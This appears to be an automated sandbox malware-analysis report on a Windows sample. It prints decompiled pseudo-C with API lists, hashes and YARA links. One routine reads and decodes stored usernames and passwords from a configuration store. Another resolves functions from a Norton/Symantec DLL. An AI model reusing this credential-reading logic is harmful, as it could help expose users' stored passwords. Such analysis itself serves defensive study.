                                                                                                                              • GetProcAddress.KERNEL32(?,00000026), ref: 0041877E
                                                                                                                              • GetProcAddress.KERNEL32(?,00000027), ref: 0041878F
                                                                                                                              • GetProcAddress.KERNEL32(?,00000028), ref: 004187A0
                                                                                                                              • GetProcAddress.KERNEL32(?,0000002B), ref: 004187B1
                                                                                                                              • GetProcAddress.KERNEL32(?,0000002C), ref: 004187C2
                                                                                                                              • GetProcAddress.KERNEL32(?,0000002D), ref: 004187D3
                                                                                                                              • GetProcAddress.KERNEL32(?,0000002E), ref: 004187E4
                                                                                                                              • GetProcAddress.KERNEL32(?,0000002F), ref: 004187F5
                                                                                                                              • GetProcAddress.KERNEL32(?,00000030), ref: 00418806
                                                                                                                              • GetProcAddress.KERNEL32(?,00000031), ref: 00418817
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc
                                                                                                                              • String ID: .\ccGUIFrm.dll$ccGUIFrm.dll
                                                                                                                              • API String ID: 190572456-4252514613
                                                                                                                              • Opcode ID: 52c8f7614150b2290af33ca181b1d3e42902ac511bdd19a470639d568e823f0f
                                                                                                                              • Instruction ID: 5458caf5bf9c17f03222da0914fa1bd599c547d1d57cc06080d293367fe7c3af
                                                                                                                              • Opcode Fuzzy Hash: 52c8f7614150b2290af33ca181b1d3e42902ac511bdd19a470639d568e823f0f
                                                                                                                              • Instruction Fuzzy Hash: 84D1FF71640B04ABD7A0EF79C845B87F7E9AF98700F01891EF29AD72A0DBB4A444CF15
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421F28 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 156fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 65%
                                                                                                                              			E00421F28(intOrPtr _a4) {
				long _v4;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* _t9;
				int _t11;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t24;
				void* _t26;
				intOrPtr _t30;
				void* _t34;
				void* _t37;
				signed int _t38;
				void** _t40;
				void* _t42;
				void* _t45;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				_t30 = _a4;
				_t38 = 0;
				while(_t30 !=  *((intOrPtr*)(0x43aed8 + _t38 * 8))) {
					_t38 = _t38 + 1;
					if(_t38 < 0x17) {
						continue;
					}
					break;
				}
				if(_t38 >= 0x17) {
					return _t9;
				}
				if(E0042AA5A(_t30, _t37, _t38, 3) == 1) {
					L22:
					_t11 = GetStdHandle(0xfffffff4);
					_t45 = _t11;
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags = _t45 - 0xffffffff;
						if(_t45 != 0xffffffff) {
							_t40 = 0x43aedc + _t38 * 8;
							_t11 = WriteFile(_t45,  *_t40, E0041CAC0( *_t40),  &_v4, 0);
						}
					}
					L25:
					return _t11;
				}
				_t11 = E0042AA5A(_t30, _t37, _t38, 3);
				_pop(_t34);
				if(_t11 != 0 ||  *0x43a860 != 1) {
					if(_t30 == 0xfc) {
						goto L25;
					} else {
						_t14 = E0041FA77(_t37, 0x43c520, 0x314, "Runtime Error!\n\nProgram: ");
						_t49 = _t48 + 0xc;
						_t61 = _t14;
						if(_t14 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0041AC13(0x314, _t34, _t37, _t38, _t61);
							_t49 = _t49 + 0x14;
						}
						 *0x43c63d = 0;
						if(GetModuleFileNameA(0, 0x43c539, 0x104) == 0) {
							_t26 = E0041FA77(_t37, 0x43c539, 0x2fb, "<program name unknown>");
							_t49 = _t49 + 0xc;
							if(_t26 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0041AC13(0x314, _t34, _t37, _t38, 0);
								_t49 = _t49 + 0x14;
							}
						}
						_t16 = E0041CAC0(0x43c539);
						_pop(_t35);
						if(_t16 + 1 <= 0x3c) {
							L16:
							_t42 = 0;
							__eflags = 0;
							goto L17;
						} else {
							_t23 = E0041CAC0(0x43c539) + 0x43c4fe;
							_t35 = 0x43c834 - E0041CAC0(0x43c539) + 0x43c4fe;
							_t24 = E00426D3D(_t37, _t23, 0x43c834 - E0041CAC0(0x43c539) + 0x43c4fe, "...", 3);
							_t49 = _t49 + 0x14;
							_t66 = _t24;
							if(_t24 == 0) {
								goto L16;
							}
							_t42 = 0;
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0041AC13(0x314, _t35, _t37, _t38, _t66);
							_t49 = _t49 + 0x14;
							L17:
							_t18 = E00426CCC(_t37, 0x43c520, 0x314, "\n\n");
							_t50 = _t49 + 0xc;
							_t67 = _t18;
							if(_t18 != 0) {
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								E0041AC13(0x314, _t35, _t37, _t38, _t67);
								_t50 = _t50 + 0x14;
							}
							_t19 = E00426CCC(_t37, 0x43c520, 0x314,  *(0x43aedc + _t38 * 8));
							_t51 = _t50 + 0xc;
							_t68 = _t19;
							if(_t19 != 0) {
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								_push(_t42);
								E0041AC13(0x314, _t35, _t37, _t38, _t68);
								_t51 = _t51 + 0x14;
							}
							_t11 = E0042A89D(_t37, 0x43c520, "Microsoft Visual C++ Runtime Library", 0x12010);
							goto L25;
						}
					}
				} else {
					goto L22;
				}
			}


























                                                                                                                              0x00421f2a
                                                                                                                              0x00421f32
                                                                                                                              0x00421f34
                                                                                                                              0x00421f3d
                                                                                                                              0x00421f41
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00421f41
                                                                                                                              0x00421f46
                                                                                                                              0x004220c7
                                                                                                                              0x004220c7
                                                                                                                              0x00421f58
                                                                                                                              0x0042208f
                                                                                                                              0x00422091
                                                                                                                              0x00422097
                                                                                                                              0x00422099
                                                                                                                              0x0042209b
                                                                                                                              0x0042209d
                                                                                                                              0x004220a0
                                                                                                                              0x004220a9
                                                                                                                              0x004220bc
                                                                                                                              0x004220bc
                                                                                                                              0x004220a0
                                                                                                                              0x004220c2
                                                                                                                              0x00000000
                                                                                                                              0x004220c2
                                                                                                                              0x00421f60
                                                                                                                              0x00421f67
                                                                                                                              0x00421f68
                                                                                                                              0x00421f7d
                                                                                                                              0x00000000
                                                                                                                              0x00421f83
                                                                                                                              0x00421f94
                                                                                                                              0x00421f99
                                                                                                                              0x00421f9c
                                                                                                                              0x00421f9e
                                                                                                                              0x00421fa0
                                                                                                                              0x00421fa1
                                                                                                                              0x00421fa2
                                                                                                                              0x00421fa3
                                                                                                                              0x00421fa4
                                                                                                                              0x00421fa5
                                                                                                                              0x00421faa
                                                                                                                              0x00421faa
                                                                                                                              0x00421fba
                                                                                                                              0x00421fc9
                                                                                                                              0x00421fd6
                                                                                                                              0x00421fdb
                                                                                                                              0x00421fe0
                                                                                                                              0x00421fe4
                                                                                                                              0x00421fe5
                                                                                                                              0x00421fe6
                                                                                                                              0x00421fe7
                                                                                                                              0x00421fe8
                                                                                                                              0x00421fe9
                                                                                                                              0x00421fee
                                                                                                                              0x00421fee
                                                                                                                              0x00421fe0
                                                                                                                              0x00421ff2
                                                                                                                              0x00421ffb
                                                                                                                              0x00421ffc
                                                                                                                              0x00422036
                                                                                                                              0x00422036
                                                                                                                              0x00422036
                                                                                                                              0x00000000
                                                                                                                              0x00421ffe
                                                                                                                              0x00422007
                                                                                                                              0x00422015
                                                                                                                              0x00422019
                                                                                                                              0x0042201e
                                                                                                                              0x00422021
                                                                                                                              0x00422023
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00422025
                                                                                                                              0x00422027
                                                                                                                              0x00422028
                                                                                                                              0x00422029
                                                                                                                              0x0042202a
                                                                                                                              0x0042202b
                                                                                                                              0x0042202c
                                                                                                                              0x00422031
                                                                                                                              0x00422038
                                                                                                                              0x0042203f
                                                                                                                              0x00422044
                                                                                                                              0x00422047
                                                                                                                              0x00422049
                                                                                                                              0x0042204b
                                                                                                                              0x0042204c
                                                                                                                              0x0042204d
                                                                                                                              0x0042204e
                                                                                                                              0x0042204f
                                                                                                                              0x00422050
                                                                                                                              0x00422055
                                                                                                                              0x00422055
                                                                                                                              0x00422061
                                                                                                                              0x00422066
                                                                                                                              0x00422069
                                                                                                                              0x0042206b
                                                                                                                              0x0042206d
                                                                                                                              0x0042206e
                                                                                                                              0x0042206f
                                                                                                                              0x00422070
                                                                                                                              0x00422071
                                                                                                                              0x00422072
                                                                                                                              0x00422077
                                                                                                                              0x00422077
                                                                                                                              0x00422085
                                                                                                                              0x00000000
                                                                                                                              0x0042208a
                                                                                                                              0x00421ffc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • _strcpy_s.LIBCMT ref: 00421F94
                                                                                                                              • __invoke_watson.LIBCMT ref: 00421FA5
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,0043C539,00000104,?,0041AD79,004011F3,?,004011F3,?), ref: 00421FC1
                                                                                                                              • _strcpy_s.LIBCMT ref: 00421FD6
                                                                                                                              • __invoke_watson.LIBCMT ref: 00421FE9
                                                                                                                              • _strlen.LIBCMT ref: 00421FF2
                                                                                                                              • _strlen.LIBCMT ref: 00421FFF
                                                                                                                              • __invoke_watson.LIBCMT ref: 0042202C
                                                                                                                              • _strcat_s.LIBCMT ref: 0042203F
                                                                                                                              • __invoke_watson.LIBCMT ref: 00422050
                                                                                                                              • _strcat_s.LIBCMT ref: 00422061
                                                                                                                              • __invoke_watson.LIBCMT ref: 00422072
                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000001,?,00000000,00000003,004220F4,000000FC,00424005,00439018,0000000C,004240C0,0041AD79,?,?,00425EA3), ref: 00422091
                                                                                                                              • _strlen.LIBCMT ref: 004220B2
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,0041AD79,00000000,?,00000001,?,00000000,00000003,004220F4,000000FC,00424005,00439018,0000000C,004240C0), ref: 004220BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                              • API String ID: 1879448924-4022980321
                                                                                                                              • Opcode ID: dc7510e3ac10e4de31defa92d87cee3d0776581bf3323f14890424cc601acb53
                                                                                                                              • Instruction ID: ab8c9aafe3329f9ea55549941f71e24eae75b1e145488c8c62df2f30fe1a17f9
                                                                                                                              • Opcode Fuzzy Hash: dc7510e3ac10e4de31defa92d87cee3d0776581bf3323f14890424cc601acb53
                                                                                                                              • Instruction Fuzzy Hash: 763139727411317AE52132227D4AF6B320C9F25784F950127FE05912D2FB8E8955C1FE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040BAE0 Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 394memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 38%
                                                                                                                              			E0040BAE0(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t137;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				void* _t145;
				signed int _t155;
				intOrPtr* _t160;
				void* _t161;
				signed int _t163;
				signed int _t165;
				intOrPtr* _t171;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int* _t180;
				signed int _t183;
				signed int _t192;
				signed int _t208;
				void* _t210;
				signed int _t211;
				void* _t212;
				void* _t217;
				signed int _t219;
				void* _t224;
				void* _t225;
				void* _t227;
				void* _t228;
				void* _t239;
				void* _t244;
				void* _t255;
				void* _t256;
				signed int _t263;
				void* _t265;
				void* _t275;
				signed int _t276;
				void* _t277;
				void* _t279;
				void* _t282;
				signed int _t284;
				signed int _t285;
				intOrPtr* _t286;
				signed int _t287;
				void* _t288;
				signed int _t289;
				signed int _t291;
				void* _t293;
				intOrPtr _t294;
				void* _t295;
				signed int* _t296;
				signed int _t297;

				_t291 = _t293 - 0x1404;
				E0041B900(0x1404);
				_t294 = _t293 - 0x44;
				_t127 =  *0x43a6a8; // 0x2a5cd135
				_t128 = _t127 ^ _t291;
				 *(_t291 + 0x1400) = _t128;
				_t129 = _t291 - 0xc;
				 *[fs:0x0] = _t129;
				 *((intOrPtr*)(_t291 - 0x10)) = _t294;
				_t280 =  *((intOrPtr*)(_t291 + 0x140c));
				_t211 = 0;
				 *((intOrPtr*)(_t291 - 0x28)) = __ecx;
				 *(_t291 - 0x1c) = 0;
				 *((intOrPtr*)(_t291 - 4)) = 0;
				 *(_t291 - 0x18) = 0;
				 *(_t291 - 0x30) = 0;
				__imp__#2(0x432444, _t128, _t275, _t279, _t210,  *[fs:0x0], E00430728, 0xffffffff);
				 *(_t291 - 0x20) = _t129;
				_t130 = E0041AFA1(0, __edx, L"excluded",  *((intOrPtr*)(_t291 + 0x140c)));
				_t295 = _t294 + 8;
				_t131 = _t130 & 0xffffff00 | _t130 == 0x00000000;
				 *(_t291 - 0x11) = _t131;
				if(_t131 == 0) {
					_t208 = E0041AFA1(0, __edx, L"useradded", _t280);
					_t295 = _t295 + 8;
					 *(_t291 - 0x44) = _t208 & 0xffffff00 | _t208 == 0x00000000;
				}
				 *((char*)(_t291 - 4)) = 3;
				E004072C0(_t291, L"//init_data//%s/*", _t280);
				_t296 = _t295 + 0xc;
				_push(_t291 - 0x1c);
				 *(_t291 - 0x34) = _t296;
				E00408FB0(_t291, _t291);
				E00412F50( *((intOrPtr*)( *((intOrPtr*)(_t291 - 0x28)) + 0x4c)));
				_t259 =  *(_t291 - 0x1c);
				_t217 = _t291 - 0x40;
				_push(_t217);
				_push(_t217);
				 *(_t291 - 0x40) = _t211;
				 *_t296 =  *(_t291 - 0x1c);
				_t137 =  *(_t291 - 0x1c);
				 *(_t291 - 0x34) = _t296;
				if(_t137 != _t211) {
					_t256 =  *_t137;
					_t259 =  *(_t256 + 4);
					 *( *(_t256 + 4))(_t137);
				}
				E00412940();
				 *((char*)(_t291 + 0x1000)) = 0;
				E0041B880(_t275, _t291 + 0x1001, _t211, 0x3ff);
				_t276 =  *(_t291 - 0x44);
				_t297 =  &(_t296[3]);
				_t141 = 0;
				 *(_t291 - 0x3c) = _t211;
				 *((intOrPtr*)(_t291 - 0x38)) = 0;
				while(_t141 <  *(_t291 - 0x40)) {
					_t260 =  *(_t291 - 0x1c);
					_t228 = _t291 - 0x18;
					_push(_t228);
					_push(_t141);
					_push(_t228);
					 *_t297 =  *(_t291 - 0x1c);
					_t155 =  *(_t291 - 0x1c);
					 *(_t291 - 0x2c) = _t297;
					if(_t155 != 0) {
						_t255 =  *_t155;
						_t260 =  *(_t255 + 4);
						 *( *(_t255 + 4))(_t155);
					}
					E004129D0( *((intOrPtr*)( *((intOrPtr*)(_t291 - 0x28)) + 0x4c)));
					 *(_t291 - 0x2c) = _t297;
					E00408F20(_t260, "name",  *((intOrPtr*)( *((intOrPtr*)(_t291 - 0x28)) + 0x4c)));
					_push(_t291 - 0x18);
					_push(_t291 - 0x48);
					_t284 =  *(E00412EA0());
					if(_t211 != _t284) {
						if(_t284 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t284 + 4))))(_t284);
						}
						if(_t211 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 8))))(_t211);
						}
						_t211 = _t284;
						 *(_t291 - 0x30) = _t211;
					}
					_t160 =  *((intOrPtr*)(_t291 - 0x48));
					if(_t160 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 8))))(_t160);
					}
					_t161 =  *_t211;
					_t259 =  *(_t161 + 0x68);
					_t233 = _t291 - 0x20;
					 *( *(_t161 + 0x68))(_t211, _t291 - 0x20);
					_t163 =  *(_t291 - 0x20);
					__imp__#2(_t163);
					_t285 = _t163;
					 *(_t291 - 0x2c) = _t285;
					if( *(_t291 - 0x11) != 0) {
						E0040B780( *((intOrPtr*)(_t291 - 0x28)), _t291, __eflags, _t285, 0);
					} else {
						 *(_t291 - 0x24) = _t297;
						E00408F20(_t259, "username", _t233);
						_push(_t291 - 0x18);
						_push(_t291 - 0x4c);
						_t287 =  *(E00412EA0());
						if(_t211 != _t287) {
							if(_t287 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t287 + 4))))(_t287);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 8))))(_t211);
							_t211 = _t287;
							 *(_t291 - 0x30) = _t211;
						}
						_t171 =  *((intOrPtr*)(_t291 - 0x4c));
						if(_t171 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t171 + 8))))(_t171);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 0x68))))(_t211, _t291 - 0x20);
						_t263 =  *(_t291 - 0x20);
						_t174 = _t263;
						_t288 = _t174 + 2;
						do {
							_t239 =  *_t174;
							_t174 = _t174 + 2;
						} while (_t239 != 0);
						_t175 = _t174 - _t288;
						_t176 = _t175 >> 1;
						if(_t175 != 0) {
							__imp__#2(_t263);
							 *(_t291 - 0x24) = _t176;
						} else {
							 *(_t291 - 0x24) = 0;
						}
						 *(_t291 - 0x50) = _t297;
						E00408F20(_t263, "password", _t239);
						_push(_t291 - 0x18);
						_push(_t291 - 0x34);
						_t289 =  *(E00412EA0());
						if(_t211 != _t289) {
							if(_t289 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t289 + 4))))(_t289);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 8))))(_t211);
							_t211 = _t289;
							 *(_t291 - 0x30) = _t211;
						}
						_t180 =  *(_t291 - 0x34);
						if(_t180 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t180 + 8))))(_t180);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 0x68))))(_t211, _t291 - 0x20);
						_t290 =  *(_t291 - 0x20);
						_t183 =  *(_t291 - 0x20);
						_t265 = _t183 + 2;
						do {
							_t244 =  *_t183;
							_t183 = _t183 + 2;
						} while (_t244 != 0);
						if(_t183 == _t265) {
							L42:
							_t276 = 0;
						} else {
							E00418C60(_t290, _t291 + 0x1000, 0x400, _t291 - 0x3c);
							_t297 = _t297 + 0x10;
							if( *(_t291 - 0x3c) == 0xffffffff) {
								goto L42;
							} else {
								_t192 = E0041B595(_t291 + 0x800, _t291 + 0x1000, 0x400);
								_t297 = _t297 + 0xc;
								__imp__#2(_t291 + 0x800);
								_t276 = _t192;
							}
						}
						_t259 =  *(_t291 - 0x44);
						_push( *(_t291 - 0x44));
						_push(_t276);
						_push( *(_t291 - 0x24));
						_push( *(_t291 - 0x2c));
						E0040B250( *((intOrPtr*)(_t291 - 0x28)));
						_t285 =  *(_t291 - 0x2c);
					}
					if(_t285 == 0) {
						_t286 = __imp__#6;
					} else {
						_t286 = __imp__#6;
						 *_t286(_t285);
					}
					if( *(_t291 - 0x11) == 0) {
						_t165 =  *(_t291 - 0x24);
						if(_t165 != 0) {
							 *_t286(_t165);
						}
						if(_t276 != 0) {
							 *_t286(_t276);
						}
					}
					 *((intOrPtr*)(_t291 - 0x38)) =  *((intOrPtr*)(_t291 - 0x38)) + 1;
					_t141 =  *((intOrPtr*)(_t291 - 0x38));
				}
				 *((intOrPtr*)(_t291 - 4)) = 2;
				_t142 =  *(_t291 - 0x1c);
				__eflags = _t142;
				if(_t142 != 0) {
					_t259 =  *_t142;
					 *((intOrPtr*)( *((intOrPtr*)( *_t142 + 8))))(_t142);
					 *(_t291 - 0x1c) = 0;
				}
				_t143 =  *(_t291 - 0x18);
				__eflags = _t143;
				if(_t143 != 0) {
					_t227 =  *_t143;
					_t259 =  *(_t227 + 8);
					 *( *(_t227 + 8))(_t143);
					_t143 = 0;
					__eflags = 0;
					 *(_t291 - 0x18) = 0;
				}
				__eflags = _t211;
				if(_t211 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 8))))(_t211);
					_t143 =  *(_t291 - 0x18);
					_t211 = 0;
					__eflags = 0;
				}
				_t219 =  *(_t291 - 0x20);
				__eflags = _t219;
				if(_t219 != 0) {
					__imp__#6(_t219);
					_t143 =  *(_t291 - 0x18);
				}
				__eflags = _t211;
				 *((char*)(_t291 - 4)) = 1;
				if(_t211 != 0) {
					_t259 =  *_t211;
					 *((intOrPtr*)( *((intOrPtr*)( *_t211 + 8))))(_t211);
					_t143 =  *(_t291 - 0x18);
				}
				__eflags = _t143;
				 *((char*)(_t291 - 4)) = 0;
				if(_t143 != 0) {
					_t225 =  *_t143;
					_t259 =  *(_t225 + 8);
					 *( *(_t225 + 8))(_t143);
				}
				_t144 =  *(_t291 - 0x1c);
				__eflags = _t144;
				 *((intOrPtr*)(_t291 - 4)) = 0xffffffff;
				if(_t144 != 0) {
					_t224 =  *_t144;
					_t259 =  *(_t224 + 8);
					_t144 =  *( *(_t224 + 8))(_t144);
				}
				 *[fs:0x0] =  *(_t291 - 0xc);
				_pop(_t277);
				_pop(_t282);
				_pop(_t212);
				_t145 = E0041B3F9(_t144, _t212,  *(_t291 + 0x1400) ^ _t291, _t259, _t277, _t282);
				__eflags = _t291 + 0x1404;
				return _t145;
			}































































                                                                                                                              0x0040bae1
                                                                                                                              0x0040baed
                                                                                                                              0x0040bb00
                                                                                                                              0x0040bb03
                                                                                                                              0x0040bb08
                                                                                                                              0x0040bb0a
                                                                                                                              0x0040bb14
                                                                                                                              0x0040bb17
                                                                                                                              0x0040bb1d
                                                                                                                              0x0040bb20
                                                                                                                              0x0040bb26
                                                                                                                              0x0040bb28
                                                                                                                              0x0040bb2b
                                                                                                                              0x0040bb2e
                                                                                                                              0x0040bb31
                                                                                                                              0x0040bb34
                                                                                                                              0x0040bb3c
                                                                                                                              0x0040bb48
                                                                                                                              0x0040bb4b
                                                                                                                              0x0040bb50
                                                                                                                              0x0040bb55
                                                                                                                              0x0040bb5a
                                                                                                                              0x0040bb5d
                                                                                                                              0x0040bb65
                                                                                                                              0x0040bb6a
                                                                                                                              0x0040bb72
                                                                                                                              0x0040bb72
                                                                                                                              0x0040bb7f
                                                                                                                              0x0040bb83
                                                                                                                              0x0040bb88
                                                                                                                              0x0040bb8e
                                                                                                                              0x0040bb95
                                                                                                                              0x0040bb99
                                                                                                                              0x0040bba4
                                                                                                                              0x0040bba9
                                                                                                                              0x0040bbac
                                                                                                                              0x0040bbaf
                                                                                                                              0x0040bbb0
                                                                                                                              0x0040bbb3
                                                                                                                              0x0040bbb6
                                                                                                                              0x0040bbb8
                                                                                                                              0x0040bbbd
                                                                                                                              0x0040bbc0
                                                                                                                              0x0040bbc2
                                                                                                                              0x0040bbc4
                                                                                                                              0x0040bbc8
                                                                                                                              0x0040bbc8
                                                                                                                              0x0040bbcd
                                                                                                                              0x0040bbdf
                                                                                                                              0x0040bbe6
                                                                                                                              0x0040bbeb
                                                                                                                              0x0040bbee
                                                                                                                              0x0040bbf1
                                                                                                                              0x0040bbf3
                                                                                                                              0x0040bbf6
                                                                                                                              0x0040bc00
                                                                                                                              0x0040bc09
                                                                                                                              0x0040bc0c
                                                                                                                              0x0040bc0f
                                                                                                                              0x0040bc10
                                                                                                                              0x0040bc11
                                                                                                                              0x0040bc14
                                                                                                                              0x0040bc16
                                                                                                                              0x0040bc1b
                                                                                                                              0x0040bc1e
                                                                                                                              0x0040bc20
                                                                                                                              0x0040bc22
                                                                                                                              0x0040bc26
                                                                                                                              0x0040bc26
                                                                                                                              0x0040bc2e
                                                                                                                              0x0040bc36
                                                                                                                              0x0040bc3e
                                                                                                                              0x0040bc46
                                                                                                                              0x0040bc4a
                                                                                                                              0x0040bc53
                                                                                                                              0x0040bc57
                                                                                                                              0x0040bc5b
                                                                                                                              0x0040bc63
                                                                                                                              0x0040bc63
                                                                                                                              0x0040bc67
                                                                                                                              0x0040bc6f
                                                                                                                              0x0040bc6f
                                                                                                                              0x0040bc71
                                                                                                                              0x0040bc73
                                                                                                                              0x0040bc73
                                                                                                                              0x0040bc76
                                                                                                                              0x0040bc7b
                                                                                                                              0x0040bc83
                                                                                                                              0x0040bc83
                                                                                                                              0x0040bc85
                                                                                                                              0x0040bc87
                                                                                                                              0x0040bc8a
                                                                                                                              0x0040bc8f
                                                                                                                              0x0040bc91
                                                                                                                              0x0040bc95
                                                                                                                              0x0040bc9f
                                                                                                                              0x0040bca1
                                                                                                                              0x0040bca4
                                                                                                                              0x0040be22
                                                                                                                              0x0040bcaa
                                                                                                                              0x0040bcad
                                                                                                                              0x0040bcb5
                                                                                                                              0x0040bcc0
                                                                                                                              0x0040bcc7
                                                                                                                              0x0040bccd
                                                                                                                              0x0040bcd1
                                                                                                                              0x0040bcd5
                                                                                                                              0x0040bcdd
                                                                                                                              0x0040bcdd
                                                                                                                              0x0040bce5
                                                                                                                              0x0040bce7
                                                                                                                              0x0040bce9
                                                                                                                              0x0040bce9
                                                                                                                              0x0040bcec
                                                                                                                              0x0040bcf1
                                                                                                                              0x0040bcf9
                                                                                                                              0x0040bcf9
                                                                                                                              0x0040bd05
                                                                                                                              0x0040bd07
                                                                                                                              0x0040bd0a
                                                                                                                              0x0040bd0c
                                                                                                                              0x0040bd10
                                                                                                                              0x0040bd10
                                                                                                                              0x0040bd13
                                                                                                                              0x0040bd16
                                                                                                                              0x0040bd1b
                                                                                                                              0x0040bd1d
                                                                                                                              0x0040bd1f
                                                                                                                              0x0040bd2b
                                                                                                                              0x0040bd31
                                                                                                                              0x0040bd21
                                                                                                                              0x0040bd21
                                                                                                                              0x0040bd21
                                                                                                                              0x0040bd37
                                                                                                                              0x0040bd3f
                                                                                                                              0x0040bd47
                                                                                                                              0x0040bd4b
                                                                                                                              0x0040bd54
                                                                                                                              0x0040bd58
                                                                                                                              0x0040bd5c
                                                                                                                              0x0040bd64
                                                                                                                              0x0040bd64
                                                                                                                              0x0040bd6c
                                                                                                                              0x0040bd6e
                                                                                                                              0x0040bd70
                                                                                                                              0x0040bd70
                                                                                                                              0x0040bd73
                                                                                                                              0x0040bd78
                                                                                                                              0x0040bd80
                                                                                                                              0x0040bd80
                                                                                                                              0x0040bd8c
                                                                                                                              0x0040bd8e
                                                                                                                              0x0040bd91
                                                                                                                              0x0040bd93
                                                                                                                              0x0040bd96
                                                                                                                              0x0040bd96
                                                                                                                              0x0040bd99
                                                                                                                              0x0040bd9c
                                                                                                                              0x0040bda5
                                                                                                                              0x0040be18
                                                                                                                              0x0040be18
                                                                                                                              0x0040bda7
                                                                                                                              0x0040bdb9
                                                                                                                              0x0040bdbe
                                                                                                                              0x0040bdc5
                                                                                                                              0x00000000
                                                                                                                              0x0040bdc7
                                                                                                                              0x0040bdda
                                                                                                                              0x0040bddf
                                                                                                                              0x0040bde9
                                                                                                                              0x0040bdef
                                                                                                                              0x0040bdef
                                                                                                                              0x0040bdc5
                                                                                                                              0x0040bdf1
                                                                                                                              0x0040bdfa
                                                                                                                              0x0040bdfb
                                                                                                                              0x0040bdfc
                                                                                                                              0x0040bdfd
                                                                                                                              0x0040be01
                                                                                                                              0x0040be06
                                                                                                                              0x0040be06
                                                                                                                              0x0040be0b
                                                                                                                              0x0040be29
                                                                                                                              0x0040be0d
                                                                                                                              0x0040be0e
                                                                                                                              0x0040be14
                                                                                                                              0x0040be14
                                                                                                                              0x0040be33
                                                                                                                              0x0040be35
                                                                                                                              0x0040be3a
                                                                                                                              0x0040be3d
                                                                                                                              0x0040be3d
                                                                                                                              0x0040be41
                                                                                                                              0x0040be44
                                                                                                                              0x0040be44
                                                                                                                              0x0040be41
                                                                                                                              0x0040be46
                                                                                                                              0x0040be4a
                                                                                                                              0x0040be4a
                                                                                                                              0x0040be52
                                                                                                                              0x0040be6b
                                                                                                                              0x0040be6e
                                                                                                                              0x0040be70
                                                                                                                              0x0040be72
                                                                                                                              0x0040be78
                                                                                                                              0x0040be7a
                                                                                                                              0x0040be7a
                                                                                                                              0x0040be81
